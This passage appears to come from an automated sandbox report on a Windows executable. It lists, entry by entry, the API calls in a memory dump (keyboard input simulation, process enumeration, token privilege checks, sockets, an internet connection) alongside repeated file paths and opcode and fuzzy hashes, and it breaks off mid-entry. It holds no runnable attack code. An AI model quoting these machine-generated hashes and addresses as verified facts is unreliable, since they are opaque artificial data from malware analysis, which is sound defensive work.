                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 0a92c4687abb67145aa023faaa296c011d504d3a15510550bb5c78dad21e7ed5
                                                        • Instruction ID: 6fbf93d2e7c75b823dfba1bc3f52545487b35f1fc1da7fc5103c55a6b5e65aae
                                                        • Opcode Fuzzy Hash: 0a92c4687abb67145aa023faaa296c011d504d3a15510550bb5c78dad21e7ed5
                                                        • Instruction Fuzzy Hash: E1811075A00109EFCB04DFA4C984EEEB7B9FF89315F204568F505AB291DB71AE46CB60
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 45450c71d201d52d4c45e4aea9f627dacdf43b76352337aaf96146b354eb8149
                                                        • Instruction ID: d358084534bc92c4e38b07b8d450cf5f950ee3dcf0559c2f7c0596008f5ec6f8
                                                        • Opcode Fuzzy Hash: 45450c71d201d52d4c45e4aea9f627dacdf43b76352337aaf96146b354eb8149
                                                        • Instruction Fuzzy Hash: 9E51A2746043019ECB2CAF65E895ABEB7E5AF45310F20D82FE586DB292DB71D8C08701
                                                        APIs
                                                        • GetWindowRect.USER32(0144EC50,?), ref: 00149863
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00149896
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00149903
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 97bed001e6315d2d3b21531b9782c2631a060f966d51f237b47098ccbe4f0ee9
                                                        • Instruction ID: b97f64faea457185586198008e3923f0b1da591326bee5ea3dff1de819e5093e
                                                        • Opcode Fuzzy Hash: 97bed001e6315d2d3b21531b9782c2631a060f966d51f237b47098ccbe4f0ee9
                                                        • Instruction Fuzzy Hash: 9F513D34A00209EFCB14DF68C880AAE7BB6FF56364F14815DF9559B2A0D730AD81CB90
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00119AD2
                                                        • __itow.LIBCMT ref: 00119B03
                                                          • Part of subcall function 00119D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00119DBE
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00119B6C
                                                        • __itow.LIBCMT ref: 00119BC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: 333ca4950c3dfebd06670d86a4d266922cc5f897996d25ac2a6352919722c8a7
                                                        • Instruction ID: db1de886974a3cb37816a4a4b500b384ed4bf9ee61b076ecc03dd871e861b07a
                                                        • Opcode Fuzzy Hash: 333ca4950c3dfebd06670d86a4d266922cc5f897996d25ac2a6352919722c8a7
                                                        • Instruction Fuzzy Hash: 03418274A04209ABDF15EF54D855FEE7BB9EF44720F00006DF919A7292DB709E84CB61
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 001369D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001369E1
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00136A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 8da085d3de05b17d872cb5d342061f23800cc17b4c6c944a85b31d0f66ee777e
                                                        • Instruction ID: 19b5220560b41ec60fb377e79c54baef2970905a45c037b91f94a7d161af6ef2
                                                        • Opcode Fuzzy Hash: 8da085d3de05b17d872cb5d342061f23800cc17b4c6c944a85b31d0f66ee777e
                                                        • Instruction Fuzzy Hash: F4418175640200AFEB60AF24CC8AFAE77A4AB45B14F04C41CFA59AF2D3DB709D418791
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0014F910), ref: 001364A7
                                                        • _strlen.LIBCMT ref: 001364D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: de0a965df98ce86ec2bbf5a3cceb93a9cabdb3578237b29d5ed0aec3e52d83fd
                                                        • Instruction ID: e1fc610648e3db72f0dc915b03c07e979efc015da900675e2c02c9bc2667d5fa
                                                        • Opcode Fuzzy Hash: de0a965df98ce86ec2bbf5a3cceb93a9cabdb3578237b29d5ed0aec3e52d83fd
                                                        • Instruction Fuzzy Hash: 46419375A00104BFCB14EBA8DC95FFEB7A9AF54350F148169F91A9B2A3DB30AD40CB50
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0012B89E
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0012B8C4
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0012B8E9
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0012B915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: bfa3ca0bb991caabd26988ca284a24d581b51da7b7df8c84ec6214becf1f7399
                                                        • Instruction ID: 2da7b67bc18f63d94c1e645953f052b1a152ddd7264d6546e0b0fa2259ee9bf0
                                                        • Opcode Fuzzy Hash: bfa3ca0bb991caabd26988ca284a24d581b51da7b7df8c84ec6214becf1f7399
                                                        • Instruction Fuzzy Hash: 0541F539A00610DFCB11EF15C588A9DBBA1AF4A714F098098ED4A9B762CB30FD55CB91
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001488DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: f3d77ca47a713a6a93d812e95a19f339bbaade6c9dfdc54afafcb34b7beed3e4
                                                        • Instruction ID: 29b9c5cbdd4ff31b7a93be3fa4992dd9a319a3a4fca0ce3618d4eb1bb201cfeb
                                                        • Opcode Fuzzy Hash: f3d77ca47a713a6a93d812e95a19f339bbaade6c9dfdc54afafcb34b7beed3e4
                                                        • Instruction Fuzzy Hash: 1E31F234610509FFEB249B58CC45FBC37A1EB46314F944416FA15E62B1CF30E9909B52
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0014AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0014ABD6
                                                        • PtInRect.USER32(?,?,0014C014), ref: 0014ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0014AC57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 00e6a736347541fd7c88232fcaddd98bb50fb757b4d07452b93fb146cb4a82a3
                                                        • Instruction ID: 4c844af9abca68d9ceb02a19017ec57a94c9ed48bbda47b6e207020d77790728
                                                        • Opcode Fuzzy Hash: 00e6a736347541fd7c88232fcaddd98bb50fb757b4d07452b93fb146cb4a82a3
                                                        • Instruction Fuzzy Hash: 14419C35A40518DFCB11CF58C8C4AA97BF6FF49300F9A84A9E8189F270C730A981CB92
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00120B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00120B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00120BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00120BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: a48447943c64dd3de517a707b51de0f2d7993290a9eae61294d1f3a8db0f29a2
                                                        • Instruction ID: 3969688caa8c23e5cfb820d9ed1c89c36ce90c87225d591edb0018799a547168
                                                        • Opcode Fuzzy Hash: a48447943c64dd3de517a707b51de0f2d7993290a9eae61294d1f3a8db0f29a2
                                                        • Instruction Fuzzy Hash: E2316E74D40628AEFF36CF25AC05BFABBA5AB4D315F08435EF490512E3C37489A19751
                                                        APIs
                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00120C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00120C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00120CE1
                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00120D33
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b629fd9cff1bdf7372a82f335496d13b5ff337db86b9df5ef20059a5ee11826b
                                                        • Instruction ID: 75e62baef12b720ff18ad265ac7538b18b396af3414d9b96a409aea10a6144c7
                                                        • Opcode Fuzzy Hash: b629fd9cff1bdf7372a82f335496d13b5ff337db86b9df5ef20059a5ee11826b
                                                        • Instruction Fuzzy Hash: 36315C7090022C6EFF3ACB64AC047FEBB66AB4D310F04435EE480511D2C3755DB59751
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000F61FB
                                                        • __isleadbyte_l.LIBCMT ref: 000F6229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000F6257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000F628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 25cdabb4dd0c05543f29de5d03197dfc7bb864dc496e311c17bb4ad389739431
                                                        • Instruction ID: 6a1a7cc93ce902d33c5a1f79589968814179025d83b615c4bfdcf2815b158e57
                                                        • Opcode Fuzzy Hash: 25cdabb4dd0c05543f29de5d03197dfc7bb864dc496e311c17bb4ad389739431
                                                        • Instruction Fuzzy Hash: 3A31E13160064AAFDF618F65CC44BBB7BF9FF42310F154029E924979A1D732E950EB90
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00144F02
                                                          • Part of subcall function 00123641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012365B
                                                          • Part of subcall function 00123641: GetCurrentThreadId.KERNEL32 ref: 00123662
                                                          • Part of subcall function 00123641: AttachThreadInput.USER32(00000000,?,00125005), ref: 00123669
                                                        • GetCaretPos.USER32(?), ref: 00144F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00144F4E
                                                        • GetForegroundWindow.USER32 ref: 00144F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 3a4ff945c2d9540bea944b73f0823d2b217dd2a0574368121e1203caa04951b7
                                                        • Instruction ID: 9e97c4fb6e379599c935ae4f96865b0db08215d6186b0f52ae8409e0f54b0b1f
                                                        • Opcode Fuzzy Hash: 3a4ff945c2d9540bea944b73f0823d2b217dd2a0574368121e1203caa04951b7
                                                        • Instruction Fuzzy Hash: A7310B72D00108AFDB10EFA9C885EEFB7FDEF99304F10406AE455E7252DA759E458BA0
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00123C7A
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00123C88
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00123CA8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00123D52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: b404e458831f53c126e18a1feb9b48bb6ad5a44091ec91ebb6cbf78920c3ef9d
                                                        • Instruction ID: 6a55c052b4ad6f954b3734c74133ddbb50560c95d8375325b3b80871b778f539
                                                        • Opcode Fuzzy Hash: b404e458831f53c126e18a1feb9b48bb6ad5a44091ec91ebb6cbf78920c3ef9d
                                                        • Instruction Fuzzy Hash: 8131B4311083059FD304EF60D885FEFBBE8EF99354F50082DF595861A2EB719A4ACB52
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • GetCursorPos.USER32(?), ref: 0014C4D2
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000FB9AB,?,?,?,?,?), ref: 0014C4E7
                                                        • GetCursorPos.USER32(?), ref: 0014C534
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000FB9AB,?,?,?), ref: 0014C56E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 255ba508cf1deb9cb6a0bad2fd7054736b86ff309906aab35b76631e264df86b
                                                        • Instruction ID: d6b66a522e980714ceec0b34ea4b2e42f113d3be8d48b719a640d559a6c7978b
                                                        • Opcode Fuzzy Hash: 255ba508cf1deb9cb6a0bad2fd7054736b86ff309906aab35b76631e264df86b
                                                        • Instruction Fuzzy Hash: 1431A035601418AFCB65CF58C858EEE7BB6EB0A350F444069F9058B671C731AD91DFE4
                                                        APIs
                                                          • Part of subcall function 0011810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00118121
                                                          • Part of subcall function 0011810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0011812B
                                                          • Part of subcall function 0011810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0011813A
                                                          • Part of subcall function 0011810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00118141
                                                          • Part of subcall function 0011810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00118157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001186A3
                                                        • _memcmp.LIBCMT ref: 001186C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001186FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00118703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 9673fbca116eb737ed215de001287c98e081570fcfb44f8b699512cec4a51d67
                                                        • Instruction ID: fe8c261e2611a9ae8b45839fe6f33f066591ddd9929e63f041faf6f88beace88
                                                        • Opcode Fuzzy Hash: 9673fbca116eb737ed215de001287c98e081570fcfb44f8b699512cec4a51d67
                                                        • Instruction Fuzzy Hash: 0521AF72E00108EFDB18DFA4C959BEEB7F8EF45304F158069E444AB251EB31AE85CB91
                                                        APIs
                                                        • __setmode.LIBCMT ref: 000E09AE
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        • _fprintf.LIBCMT ref: 000E09E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00115DBB
                                                          • Part of subcall function 000E4AAA: _flsall.LIBCMT ref: 000E4AC3
                                                        • __setmode.LIBCMT ref: 000E0A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 317a95469dd6d93ec81fd11fb96950b34e1332a3dffd9ea38a6b0b49fbf896e7
                                                        • Instruction ID: 369f6f9d73b71099ed4211ced51c933b16c76357b4c43e2a776fc527d1f35b39
                                                        • Opcode Fuzzy Hash: 317a95469dd6d93ec81fd11fb96950b34e1332a3dffd9ea38a6b0b49fbf896e7
                                                        • Instruction Fuzzy Hash: 11116A36504688BFCB04B7B6AC46EFE77A9DF85320F140069F10477193EF70598683A2
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001317A3
